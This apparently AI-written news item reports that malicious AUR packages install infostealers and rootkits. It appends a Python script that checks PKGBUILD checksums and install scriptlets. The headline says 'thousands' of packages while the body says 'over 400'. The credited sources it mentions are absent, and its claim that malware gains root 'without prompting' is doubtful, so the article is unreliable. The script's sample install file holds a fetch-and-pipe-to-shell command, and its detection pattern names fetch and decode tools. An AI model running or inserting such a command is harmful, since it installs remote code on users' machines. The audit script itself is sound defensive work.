Thousands of Arch AUR packages found with hidden malware

Security researchers discovered over 400 AUR packages delivering infostealers and rootkits, putting Arch users at risk.

Over 400 packages in the Arch User Repository were found to contain malicious payloads.

Researchers analysing recent AUR submissions uncovered code that silently installs an infostealer and a rootkit. The affected packages span several popular categories, from development tools to system utilities. The malicious code is embedded in install scripts, so it runs automatically when users build the packages.

Arch users who trust the community-maintained repository now face a new attack surface. Because AUR packages are built locally, the malware can gain root privileges on the host without prompting. The incident highlights the need for better auditing of community repositories and for users to verify source integrity before building.

If you rely on AUR, consider switching to vetted binaries or checking package hashes manually until the repository cleans up the compromised entries.
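As an added illustration (not from the article or its sources), here is a static pre-build check in Python for the two things the article points to: install scripts and source hashes. It assumes the standard PKGBUILD conventions (`install=` naming a `.install` file, `SKIP` as a checksum entry); the sample package text and the list of suspect commands are constructed for the example.

```python
import re

CHECKSUM_ARRAYS = "b2sums sha512sums sha384sums sha256sums sha224sums sha1sums md5sums".split()
HOOKS = "pre_install post_install pre_upgrade post_upgrade pre_remove post_remove".split()
# Heuristic chosen for this example: commands that fetch or decode content.
SUSPECT = re.compile(r"\b(curl|wget|base64|eval)\b")

def _array(text, name):
    """Entries of a bash array assignment like name=('a' 'b'), or None if absent."""
    m = re.search(rf"^{name}=\(([^)]*)\)", text, re.M)
    return None if m is None else [t.strip("'\"") for t in m.group(1).split()]

def audit_pkgbuild(text):
    """Statically inspect PKGBUILD text; it is never sourced, so nothing runs."""
    findings = []
    sources = _array(text, "source") or []
    sums = next((a for a in (_array(text, n) for n in CHECKSUM_ARRAYS) if a is not None), None)
    if sources and sums is None:
        findings.append("no checksum array: sources are not integrity-checked")
    for src, digest in zip(sources, sums or []):
        if digest == "SKIP":
            findings.append(f"checksum SKIP for source: {src}")
    m = re.search(r"^install=(\S+)", text, re.M)
    if m:
        findings.append("install scriptlet to review: " + m.group(1).strip("'\""))
    return findings

def audit_install_script(text):
    """Map each pacman hook defined in a .install file to its SUSPECT lines."""
    report, current = {}, None
    for line in text.splitlines():
        m = re.match(r"\s*(?:function\s+)?(\w+)\s*\(\)", line)
        if m:
            current = m.group(1) if m.group(1) in HOOKS else None
            if current:
                report[current] = []
        if current and SUSPECT.search(line):
            report[current].append(line.strip())
    return report

# Constructed sample input (not taken from any real package).
SAMPLE_PKGBUILD = ('pkgname=example-tool\n'
                   'source=("https://example.invalid/example-tool-1.0.tar.gz" "helper.sh")\n'
                   "sha256sums=('" + "0" * 64 + "' 'SKIP')\n"
                   'install=example-tool.install\n')
SAMPLE_INSTALL = ('post_install() {\n    echo "updating icon cache"\n'
                  '    curl -s https://example.invalid/setup | sh\n}\n'
                  'post_remove() {\n    echo "removed"\n}\n')
```

A clean result from these functions only means none of these particular patterns were found; the PKGBUILD and any `.install` file still need to be read before building.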

The Revision

Written by an AI system from the public sources credited above.